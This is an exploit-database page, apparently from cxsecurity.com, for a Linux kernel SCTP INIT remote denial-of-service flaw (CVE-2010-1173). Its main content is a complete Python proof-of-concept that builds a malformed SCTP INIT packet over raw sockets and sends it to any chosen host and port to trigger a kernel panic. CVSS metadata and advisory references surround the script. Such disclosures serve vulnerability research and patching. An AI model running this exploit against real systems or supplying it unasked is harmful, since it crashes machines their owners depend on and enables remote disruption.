Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS

2010.08.10
Credit: Jon Oberheide
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 7.1/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

# From: http://jon.oberheide.org/files/sctp-boom.py #!/usr/bin/env python ''' sctp-boom.py Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS Jon Oberheide <jon@oberheide.org> http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote attackers to cause a denial of service (system crash) via an SCTPChunkInit packet containing multiple invalid parameters that require a large amount of error data. Usage: $ python sctp-boom.py 1.2.3.4 19000 [+] sending malformed SCTP INIT msg to 1.2.3.4:19000 ... [+] kernel should have panicked on remote host 1.2.3.4 Requirements: * dnet: http://libdnet.sourceforge.net/ * dpkt: http://code.google.com/p/dpkt/ ''' import os, sys, socket def err(txt): print '[-] error: %s' % txt sys.exit(1) def msg(txt): print '[+] %s' % txt def usage(): print >> sys.stderr, 'usage: %s host port' % sys.argv[0] sys.exit(1) try: import dpkt except ImportError: err('requires dpkt library: http://code.google.com/p/dpkt/') try: import dnet except ImportError: try: import dumbnet as dnet except ImportError: err('requires dnet library: http://libdnet.sourceforge.net/') def main(): if len(sys.argv) != 3: usage() host = sys.argv[1] port = int(sys.argv[2]) try: sock = dnet.ip() intf = dnet.intf() except OSError: err('requires root privileges for raw socket access') dst_addr = socket.gethostbyname(host) interface = intf.get_dst(dnet.addr(dst_addr)) src_addr = interface['addr'].ip msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port)) invalid = '' invalid += '\x20\x10\x11\x73' invalid += '\x00\x00\xf4\x00' invalid += '\x00\x05' invalid += '\x00\x05' invalid += '\x20\x10\x11\x73' for i in xrange(20): invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff' init = dpkt.sctp.Chunk() init.type = dpkt.sctp.INIT init.data = invalid init.len = len(init) sctp = dpkt.sctp.SCTP() sctp.sport = 0x1173 sctp.dport = port sctp.data = [ init ] ip = dpkt.ip.IP() ip.src = src_addr ip.dst = dnet.ip_aton(dst_addr) ip.p = dpkt.ip.IP_PROTO_SCTP ip.data = sctp ip.len = len(ip) print `ip` pkt = dnet.ip_checksum(str(ip)) sock.send(pkt) msg('kernel should have panicked on remote host %s' % (dst_addr)) if __name__ == '__main__': main()

References:

http://git.kernel.org/?p=linux/kernel/git/davem/net-2.6.git;a=commit;h=5fa782c2f5ef6c2e4f04d3e228412c9b4a4c8809
http://article.gmane.org/gmane.linux.network/159531
https://bugzilla.redhat.com/show_bug.cgi?id=584645
http://www.redhat.com/support/errata/RHSA-2010-0474.html
http://www.openwall.com/lists/oss-security/2010/04/29/6
http://www.openwall.com/lists/oss-security/2010/04/29/1
http://www.debian.org/security/2010/dsa-2053
http://secunia.com/advisories/40218
http://secunia.com/advisories/39830
http://marc.info/?l=oss-security&m=127251068407878&w=2
http://kbase.redhat.com/faq/docs/DOC-31052


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top